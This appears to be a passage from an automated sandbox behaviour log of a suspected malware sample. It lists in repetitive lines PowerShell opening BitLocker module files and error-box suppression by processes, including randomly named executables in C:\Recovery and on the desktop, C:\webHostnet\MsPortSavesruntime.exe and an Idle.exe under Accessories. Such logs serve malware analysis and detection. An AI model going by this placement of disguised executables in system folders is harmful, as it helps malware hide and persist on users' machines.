                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeProcess information set: NOOPENFILEERRORBOX
